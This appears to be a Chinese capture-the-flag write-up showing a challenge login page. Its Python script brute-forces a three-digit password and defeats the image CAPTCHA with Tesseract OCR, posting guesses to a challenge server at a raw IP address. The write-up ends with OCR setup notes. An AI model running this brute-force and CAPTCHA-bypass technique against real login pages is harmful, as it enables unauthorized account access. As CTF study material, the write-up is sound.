<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script src="jquery-2.0.3.js"></script> </head> <body> 破解3位数字密码 <br> <form action="login.php" method="POST"> 用户名:<input type="text" value="admin" name="username" id="username"><br> 密 码:<input type="text" value="" name="pwd"><br> 验证码:<input type="text" value="" name="user_code"> <a href="#" class="code" ><br><img src="./vcode.php" onclick="this.src='./vcode.php'"></a> <input type="submit" value="submit" name="Login"><br> </form> </body> </html>
浏览器中显示大概是这样的:
分析:
要是没这个验证码的话可以直接Burp爆破,有也无伤大雅,python写个脚本识别一下就OK,先贴源码,第一次写Python脚本,不是很优美,速度有点慢,或许可以加个多线程,可以,但没必要(其实是没看该怎么写)
# -*- coding:UTF-8 -*- from PIL import Image import requests import pytesseract url_login = "http://39.100.83.188:8002/login.php" url_image = "http://39.100.83.188:8002/vcode.php" header={} payload = {"username":"admin","pwd":"admin","user_code":"1234"} r = requests.get(url_login) header['Cookie']=r.headers['Set-Cookie'][0:-8] for i in range(100,1000): payload['pwd']=str(i) print("-------------------测试密码:{}...----------------------".format(i)) judge=True while judge: r = requests.post(url_image,headers=header) with open("F:/Test.png","wb") as img: img.write(r.content) img = Image.open("F:/Test.png") text = pytesseract.image_to_string(img) payload["user_code"]=text[0:4] r = requests.post(url_login,data=payload,headers=header) r.encoding="UTF-8" if "验证码错误" in r.text: print("验证码{}错误!".format(text)) elif "密码错误" in r.text: print("WARNING:密码错误!") judge=False elif "flag" in r.text: print(r.content) judge=False exit(0) else: print("未知状态!")
PS:其实这个脚本有很多小问题,比如密码是三位数少考虑了000-099
过程:
项目主页:https://github.com/tesseract-ocr/tesseract
在其项目wiki中有很详细的各操作系统的安装说明及下载路径
我是在windows环境下安装的,安装完成后还需要将其添加到系统PATH环境变量中,同时添加系统环境变量TESSDATA_PREFIX,我的路径是:D:\Tesseract_4.1.0_Win32\tessdata
OK大功告成